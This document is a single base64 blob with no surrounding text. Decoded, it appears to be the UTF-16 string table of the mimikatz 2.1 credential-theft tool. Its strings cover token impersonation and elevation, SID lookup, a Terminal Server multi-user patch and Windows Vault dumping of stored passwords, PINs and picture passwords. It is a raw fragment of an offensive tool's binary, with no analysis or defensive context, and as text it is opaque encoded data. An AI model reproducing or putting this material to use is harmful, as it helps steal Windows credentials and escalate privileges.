AAIAA6ACAAJQBzAAoAAABUAHkAcABlACAAIAA6ACAAJQBzAAoARABvAG0AYQBpAG4AOgAgACUAcwAKAE4AYQBtAGUAIAAgADoAIAAlAHMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABOAGEAbQBlAEQAbwBtAGEAaQBuAEYAcgBvAG0AUwBJAEQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAASQBuAHYAYQBsAGkAZAAgAFMASQBEAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBsAG8AbwBrAHUAcAAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAATgBhAG0AZQAgACAAOgAgACUAcwAKAAAAVAB5AHAAZQAgACAAOgAgACUAcwAKAEQAbwBtAGEAaQBuADoAIAAlAHMACgBTAEkARAAgACAAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABTAGkAZABEAG8AbQBhAGkAbgBGAHIAbwBtAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AbABvAG8AawB1AHAAIAA7ACAALwBzAGkAZAAgAG8AcgAgAC8AbgBhAG0AZQAgAGkAcwAgAG0AaQBzAHMAaQBuAGcACgAAAAoAJQBzAAoAAAAAACAAIAAlAHMAOgAgAAAAAABzAEEATQBBAGMAYwBvAHUAbgB0AE4AYQBtAGUAAAAAACUAKgBTAAoAAAAAAG8AYgBqAGUAYwB0AFMAaQBkAAAAbwBiAGoAZQBjAHQARwBVAEkARAAAAAAACgAgACAAIABbACUAdQBdACAAAABzAEkARABIAGkAcwB0AG8AcgB5AAAAAAAgACgAIAAlAHMAIAAtAC0AIAAlAHMAXAAlAHMAIAApAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAHEAdQBpAGMAawBTAGUAYQByAGMAaAAgADsAIABOAG8AIAByAGUAcwB1AGwAdAAhACAALQAgAGYAaQBsAHQAZQByACAAdwBhAHMAIAAnACUAcwAnAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AcQB1AGkAYwBrAFMAZQBhAHIAYwBoACAAOwAgAGwAZABhAHAAXwBzAGUAYQByAGMAaABfAHMAIAAwAHgAJQB4ACAAKAAlAHUAKQAKAAAAKABzAEEATQBBAGMAYwBvAHUAbgB0AE4AYQBtAGUAPQAlAHMAKQAAACgAbwBiAGoAZQBjAHQAUwBpAGQAPQAAAFwAJQAwADIAeAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZgBpAGwAdABlAHIARgByAG8AbQBBAHIAZwBzACAAOwAgAEkAbgB2AGEAbABpAGQAIABTAEkARAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZgBpAGwAdABlAHIARgByAG8AbQBBAHIAZwBzACAAOwAgAEMAbwBuAHYAZQByAHQAUwB0AHIAaQBuAGcAUwBpAGQAVABvAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAGYAaQBsAHQAZQByAEYAcgBvAG0AQQByAGcAcwAgADsAIAAvAHMAYQBtACAAbwByACAALwBzAGkAZAAgAHQAbwAgAHQAYQByAGcAZQB0ACAAdABoAGUAIABhAGMAYwBvAHUAbgB0ACAAaQBzACAAbgBlAGUAZABlAGQACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBnAGUAdABMAGQAYQBwAEEAbgBkAFIAbwBvAHQARABOACAAOwAgAGwAZABhAHAAXwBiAGkAbgBkAF8AcwAgADAAeAAlAHgAIAAoACUAdQApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBnAGUAdABMAGQAYQBwAEEAbgBkAFIAbwBvAHQARABOACAAOwAgAGwAZABhAHAAXwBpAG4AaQB0AAoAAAAAAHIAbwBvAHQARABvAG0AYQBpAG4ATgBhAG0AaQBuAGcAQwBvAG4AdABlAHgAdAAAACgAZABuAD0AUgBvAG8AdABEAFMARQApAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAGcAZQB0AFIAbwBvAHQARABvAG0AYQBpAG4ATgBhAG0AaQBuAGcAQwBvAG4AdABlAHgAdAAgADsAIABsAGQAYQBwAF8AZwBlAHQAXwB2AGEAbAB1AGUAcwBfAGwAZQBuACAAaQBzACAATgBPAFQAIAAxAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZwBlAHQAUgBvAG8AdABEAG8AbQBhAGkAbgBOAGEAbQBpAG4AZwBDAG8AbgB0AGUAeAB0ACAAOwAgAGwAZABhAHAAXwBjAG8AdQBuAHQAXwBlAG4AdAByAGkAZQBzACAAaQBzACAATgBPAFQAIAAxAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBnAGUAdABSAG8AbwB0AEQAbwBtAGEAaQBuAE4AYQBtAGkAbgBnAEMAbwBuAHQAZQB4AHQAIAA7ACAAbABkAGEAcABfAHMAZQBhAHIAYwBoAF8AcwAgADAAeAAlAHgAIAAoACUAdQApAAoAAAAAAGUAeABpAHQAAAAAAFEAdQBpAHQAIABtAGkAbQBpAGsAYQB0AHoAAABjAGwAcwAAAEMAbABlAGEAcgAgAHMAYwByAGUAZQBuACAAKABkAG8AZQBzAG4AJwB0ACAAdwBvAHIAawAgAHcAaQB0AGgAIAByAGUAZABpAHIAZQBjAHQAaQBvAG4AcwAsACAAbABpAGsAZQAgAFAAcwBFAHgAZQBjACkAAAAAAGEAbgBzAHcAZQByAAAAAABBAG4AcwB3AGUAcgAgAHQAbwAgAHQAaABlACAAVQBsAHQAaQBtAGEAdABlACAAUQB1AGUAcwB0AGkAbwBuACAAbwBmACAATABpAGYAZQAsACAAdABoAGUAIABVAG4AaQB2AGUAcgBzAGUALAAgAGEAbgBkACAARQB2AGUAcgB5AHQAaABpAG4AZwAAAGMAbwBmAGYAZQBlAAAAAABQAGwAZQBhAHMAZQAsACAAbQBhAGsAZQAgAG0AZQAgAGEAIABjAG8AZgBmAGUAZQAhAAAAcwBsAGUAZQBwAAAAAAAAAFMAbABlAGUAcAAgAGEAbgAgAGEAbQBvAHUAbgB0ACAAbwBmACAAbQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAAABMAG8AZwAgAG0AaQBtAGkAawBhAHQAegAgAGkAbgBwAHUAdAAvAG8AdQB0AHAAdQB0ACAAdABvACAAZgBpAGwAZQAAAGIAYQBzAGUANgA0AAAAAAAAAAAAUwB3AGkAdABjAGgAIABmAGkAbABlACAAbwB1AHQAcAB1AHQALwBiAGEAcwBlADYANAAgAG8AdQB0AHAAdQB0AAAAAAB2AGUAcgBzAGkAbwBuAAAAAAAAAEQAaQBzAHAAbABhAHkAIABzAG8AbQBlACAAdgBlAHIAcwBpAG8AbgAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAAAAYwBkAAAAAAAAAAAAQwBoAGEAbgBnAGUAIABvAHIAIABkAGkAcwBwAGwAYQB5ACAAYwB1AHIAcgBlAG4AdAAgAGQAaQByAGUAYwB0AG8AcgB5AAAAbABvAGMAYQBsAHQAaQBtAGUAAAAAAAAARABpAHMAcABsAGEAeQBzACAAcwB5AHMAdABlAG0AIABsAG8AYwBhAGwAIABkAGEAdABlACAAYQBuAGQAIAB0AGkAbQBlACAAKABPAEoAIABjAG8AbQBtAGEAbgBkACkAAAAAAHMAdABhAG4AZABhAHIAZAAAAAAAUwB0AGEAbgBkAGEAcgBkACAAbQBvAGQAdQBsAGUAAABCAGEAcwBpAGMAIABjAG8AbQBtAGEAbgBkAHMAIAAoAGQAbwBlAHMAIABuAG8AdAAgAHIAZQBxAHUAaQByAGUAIABtAG8AZAB1AGwAZQAgAG4AYQBtAGUAKQAAAEIAeQBlACEACgAAADQAMgAuAAoAAAAAAAAAAAAKACAAIAAgACAAKAAgACgACgAgACAAIAAgACAAKQAgACkACgAgACAALgBfAF8AXwBfAF8AXwAuAAoAIAAgAHwAIAAgACAAIAAgACAAfABdAAoAIAAgAFwAIAAgACAAIAAgACAALwAKACAAIAAgAGAALQAtAC0ALQAnAAoAAAAAAFMAbABlAGUAcAAgADoAIAAlAHUAIABtAHMALgAuAC4AIAAAAEUAbgBkACAAIQAKAAAAAABtAGkAbQBpAGsAYQB0AHoALgBsAG8AZwAAAAAAVQBzAGkAbgBnACAAJwAlAHMAJwAgAGYAbwByACAAbABvAGcAZgBpAGwAZQAgADoAIAAlAHMACgAAAAAAZgBhAGwAcwBlAAAAaQBzAEIAYQBzAGUANgA0AEkAbgB0AGUAcgBjAGUAcAB0ACAAdwBhAHMAIAAgACAAIAA6ACAAJQBzAAoAAAAAAGkAcwBCAGEAcwBlADYANABJAG4AdABlAHIAYwBlAHAAdAAgAGkAcwAgAG4AbwB3ACAAOgAgACUAcwAKAAAAAAA2ADQAAAAAADgANgAAAAAACgBtAGkAbQBpAGsAYQB0AHoAIAAyAC4AMQAgACgAYQByAGMAaAAgAHgAOAA2ACkACgBXAGkAbgBkAG8AdwBzACAATgBUACAAJQB1AC4AJQB1ACAAYgB1AGkAbABkACAAJQB1ACAAKABhAHIAYwBoACAAeAAlAHMAKQAKAG0AcwB2AGMAIAAlAHUAIAAlAHUACgAAAEMAdQByADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB0AGEAbgBkAGEAcgBkAF8AYwBkACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAGcAZQB0AEMAdQByAHIAZQBuAHQARABpAHIAZQBjAHQAbwByAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgBlAHcAOgAgACUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAdABhAG4AZABhAHIAZABfAGMAZAAgADsAIABTAGUAdABDAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEwAbwBjAGEAbAA6ACAAAABaAG8AbgBlACAAOgAgACUALgAzADIAcwAKAAAAVQBUAEMAIAAgADoAIAAAAEwAaQBzAHQAIAAuAC4ALgAAAAAAZwBlAHQAAABHAGUAdAAgAC4ALgAuAAAAcwBlAHQAAABTAGUAdAAgAC4ALgAuAAAAZABlAGwAAABEAGUAbAAgAC4ALgAuAAAAAAAAAFMAeQBzAHQAZQBtACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAVgBhAGwAdQBlACAAbQBvAGQAdQBsAGUAAABOAGEAbQBlACAAIAAgACAAIAAgACAAOgAgACUAcwAKAFYAZQBuAGQAbwByACAARwBVAEkARAA6ACAAAAAAAAAAKQAKAEwAZQBuAGcAdABoACAAIAAgACAAIAA6ACAAJQB1AAoARABhAHQAYQAgACAAIAAgACAAIAAgADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBsAGkAcwB0ACAAOwAgAE4AdABFAG4AdQBtAGUAcgBhAHQAZQBTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAHMARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AbABpAHMAdAAgADsAIABOAHQARQBuAHUAbQBlAHIAYQB0AGUAUwB5AHMAdABlAG0ARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQBsAHUAZQBzAEUAeAAoAHMAaQB6AGUAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAQQB0AHQAcgBpAGIAdQB0AGUAcwAgADoAIAAlADAAOAB4ACAAKAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBnAGUAdAAgADsAIABOAHQAUQB1AGUAcgB5AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGcAZQB0ACAAOwAgAFMAeQBzAHQAZQBtACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAVgBhAHIAaQBhAGIAbABlACAAbgBvAHQAIABmAG8AdQBuAGQALgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBnAGUAdAAgADsAIABOAHQAUQB1AGUAcgB5AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAcwBpAHoAZQApADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGcAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAHsAYgAxADYAYgAwADAAYgA1AC0AYwBhAGYAZQAtAGIAYQBiAGUALQAwAGUAZQAwAC0AZABhAGIAYQBkAGEAYgBhAGQAMAAwADAAfQAAAAAANAAxADAAMAAyADAAMAAwADQAYwAwADAANgAxADAAMAAyADAAMAAwADUANgAwADAANgA5ADAAMAA2ADUAMAAwADIAYwAwADAAMgAwADAAMAA0ADEAMAAwADIAMAAwADAANABjADAAMAAyADcAMAAwADQAMQAwADAANgBkADAAMAA2AGYAMAAwADcANQAwADAANwAyADAAMAAwADAAMAAwAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAHMAZQB0ACAAOwAgAE4AdABTAGUAdABTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAEUAeAAoAGQAYQB0AGEAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAHMAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBkAGUAbAAgADsAIABTAHkAcwB0AGUAbQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAFYAYQByAGkAYQBiAGwAZQAgAG4AbwB0ACAAZgBvAHUAbgBkAC4ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZABlAGwAIAA7ACAATgB0AFMAZQB0AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZABlAGwAIAA7ACAAUgB0AGwARwBVAEkARABGAHIAbwBtAFMAdAByAGkAbgBnADoAIAAwAHgAJQAwADgAeAAKAAAAAABOAE8ATgBfAFYATwBMAEEAVABJAEwARQAAAAAAQgBPAE8AVABTAEUAUgBWAEkAQwBFAF8AQQBDAEMARQBTAFMAAAAAAFIAVQBOAFQASQBNAEUAXwBBAEMAQwBFAFMAUwAAAAAASABBAFIARABXAEEAUgBFAF8ARQBSAFIATwBSAF8AUgBFAEMATwBSAEQAAABBAFUAVABIAEUATgBUAEkAQwBBAFQARQBEAF8AVwBSAEkAVABFAF8AQQBDAEMARQBTAFMAAAAAAAAAAABUAEkATQBFAF8AQgBBAFMARQBEAF8AQQBVAFQASABFAE4AVABJAEMAQQBUAEUARABfAFcAUgBJAFQARQBfAEEAQwBDAEUAUwBTAAAAQQBQAFAARQBOAEQAXwBXAFIASQBUAEUAAAAAAEsAaQB3AGkARQBmAGkAVgBhAHIAaQBhAGIAbABlAHMAAAAAAEUAZgBpAEIAbwBvAHQAVgBhAHIAaQBhAGIAbABlAHMAAAAAAEUAeABwAFMAZQBjAHUAcgBlAEIAbwBvAHQAVgBlAG4AZABvAHIAAAAlAHMAIAAtACAAAAB3AGgAbwBhAG0AaQAAAAAARABpAHMAcABsAGEAeQAgAGMAdQByAHIAZQBuAHQAIABpAGQAZQBuAHQAaQB0AHkAAAAAAEwAaQBzAHQAIABhAGwAbAAgAHQAbwBrAGUAbgBzACAAbwBmACAAdABoAGUAIABzAHkAcwB0AGUAbQAAAGUAbABlAHYAYQB0AGUAAABJAG0AcABlAHIAcwBvAG4AYQB0AGUAIABhACAAdABvAGsAZQBuAAAAcgBlAHYAZQByAHQAAAAAAFIAZQB2AGUAcgB0ACAAdABvACAAcAByAG8AYwBlAHMAIAB0AG8AawBlAG4AAAAAAHQAbwBrAGUAbgAAAFQAbwBrAGUAbgAgAG0AYQBuAGkAcAB1AGwAYQB0AGkAbwBuACAAbQBvAGQAdQBsAGUAAAAgACoAIABQAHIAbwBjAGUAcwBzACAAVABvAGsAZQBuACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AdwBoAG8AYQBtAGkAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAgACoAIABUAGgAcgBlAGEAZAAgAFQAbwBrAGUAbgAgACAAOgAgAAAAbgBvACAAdABvAGsAZQBuAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwB3AGgAbwBhAG0AaQAgADsAIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAZABvAG0AYQBpAG4AYQBkAG0AaQBuAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBnAGUAdABDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAFMASQBEACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlACAAOwAgAE4AbwAgAHUAcwBlAHIAbgBhAG0AZQAgAGEAdgBhAGkAbABhAGIAbABlACAAdwBoAGUAbgAgAFMAWQBTAFQARQBNAAoAAABUAG8AawBlAG4AIABJAGQAIAAgADoAIAAlAHUACgBVAHMAZQByACAAbgBhAG0AZQAgADoAIAAlAHMACgBTAEkARAAgAG4AYQBtAGUAIAAgADoAIAAAAAAAJQBzAFwAJQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABOAGEAbQBlAEQAbwBtAGEAaQBuAEYAcgBvAG0AUwBJAEQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBDAHIAZQBhAHQAZQBXAGUAbABsAEsAbgBvAHcAbgBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAHIAZQB2AGUAcgB0ACAAOwAgAFMAZQB0AFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABBAG4AbwBuAHkAbQBvAHUAcwAAAEkAZABlAG4AdABpAGYAaQBjAGEAdABpAG8AbgAAAAAASQBtAHAAZQByAHMAbwBuAGEAdABpAG8AbgAAAEQAZQBsAGUAZwBhAHQAaQBvAG4AAAAAACUALQAxADAAdQAJAAAAAAAlAHMAXAAlAHMACQAlAHMAAAAAAAkAKAAlADAAMgB1AGcALAAlADAAMgB1AHAAKQAJACUAcwAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlAF8AYwBhAGwAbABiAGEAYwBrACAAOwAgAEMAaABlAGMAawBUAG8AawBlAG4ATQBlAG0AYgBlAHIAcwBoAGkAcAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAlAHUACQAAACAALQA+ACAASQBtAHAAZQByAHMAbwBuAGEAdABlAGQAIAAhAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQBfAGMAYQBsAGwAYgBhAGMAawAgADsAIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAbQB1AGwAdABpAHIAZABwAAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAcABhAHQAYwBoACAAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIABzAGUAcgB2AGkAYwBlACAAdABvACAAYQBsAGwAbwB3ACAAbQB1AGwAdABpAHAAbABlAHMAIAB1AHMAZQByAHMAAAB0AHMAAAAAAFQAZQByAG0AaQBuAGEAbAAgAFMAZQByAHYAZQByACAAbQBvAGQAdQBsAGUAAAAAAHQAZQByAG0AcwByAHYALgBkAGwAbAAAAFQAZQByAG0AUwBlAHIAdgBpAGMAZQAAAAAAAABXAGkAbgBkAG8AdwBzACAAVgBhAHUAbAB0AC8AQwByAGUAZABlAG4AdABpAGEAbAAgAG0AbwBkAHUAbABlAAAAdgBhAHUAbAB0AGMAbABpAAAAAABWYXVsdEVudW1lcmF0ZUl0ZW1UeXBlcwBWYXVsdEVudW1lcmF0ZVZhdWx0cwAAAABWYXVsdE9wZW5WYXVsdAAAVmF1bHRHZXRJbmZvcm1hdGlvbgBWYXVsdEVudW1lcmF0ZUl0ZW1zAFZhdWx0Q2xvc2VWYXVsdABWYXVsdEZyZWUAAABWYXVsdEdldEl0ZW0AAAAARABvAG0AYQBpAG4AIABQAGEAcwBzAHcAbwByAGQAAABEAG8AbQBhAGkAbgAgAEMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAAAARABvAG0AYQBpAG4AIABFAHgAdABlAG4AZABlAGQAAABQAGkAbgAgAEwAbwBnAG8AbgAAAFAAaQBjAHQAdQByAGUAIABQAGEAcwBzAHcAbwByAGQAAAAAAEIAaQBvAG0AZQB0AHIAaQBjAAAATgBlAHgAdAAgAEcAZQBuAGUAcgBhAHQAaQBvAG4AIABDAHIAZQBkAGUAbgB0AGkAYQBsAAAAAAAKAFYAYQB1AGwAdAAgADoAIAAAAAkASQB0AGUAbQBzACAAKAAlAHUAKQAKAAAAAAAJACAAJQAyAHUALgAJACUAcwAKAAAAAAAJAAkAVAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAkACQBMAGEAcwB0AFcAcgBpAHQAdABlAG4AIAAgACAAIAAgADoAIAAAAAAACQAJAEYAbABhAGcAcwAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAAkACQBSAGUAcwBzAG8AdQByAGMAZQAgACAAIAAgACAAIAAgADoAIAAAAAAACQAJAEkAZABlAG4AdABpAHQAeQAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAJAAkAQQB1AHQAaABlAG4AdABpAGMAYQB0AG8AcgAgACAAIAA6ACAAAAAAAAkACQBQAHIAbwBwAGUAcgB0AHkAIAAlADIAdQAgACAAIAAgACAAOgAgAAAACQAJACoAQQB1AHQAaABlAG4AdABpAGMAYQB0AG8AcgAqACAAOgAgAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0ACAAOwAgAFYAYQB1AGwAdABHAGUAdABJAHQAZQBtADcAIAA6ACAAJQAwADgAeAAAAAAACQAJAFAAYQBjAGsAYQBnAGUAUwBpAGQAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0ACAAOwAgAFYAYQB1AGwAdABHAGUAdABJAHQAZQBtADgAIAA6ACAAJQAwADgAeAAAAAAACgAJAAkAKgAqACoAIAAlAHMAIAAqACoAKgAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAIAA7ACAAVgBhAHUAbAB0AEUAbgB1AG0AZQByAGEAdABlAFYAYQB1AGwAdABzACAAOgAgADAAeAAlADAAOAB4AAoAAAAAAAkACQBVAHMAZQByACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAJQBzAFwAJQBzAAAAAAAAAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBcAEwAbwBnAG8AbgBVAEkAXABQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZAAAAAAAYgBnAFAAYQB0AGgAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgADIAIAA6ACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAMQAgADoAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIABTAEkARAAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABDAG8AbgB2AGUAcgB0AFMAaQBkAFQAbwBTAHQAcgBpAG4AZwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIABQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAlADAAOAB4AAoAAAAAAAkACQBQAGEAcwBzAHcAbwByAGQAIAAgACAAIAAgACAAIAAgADoAIAAAAA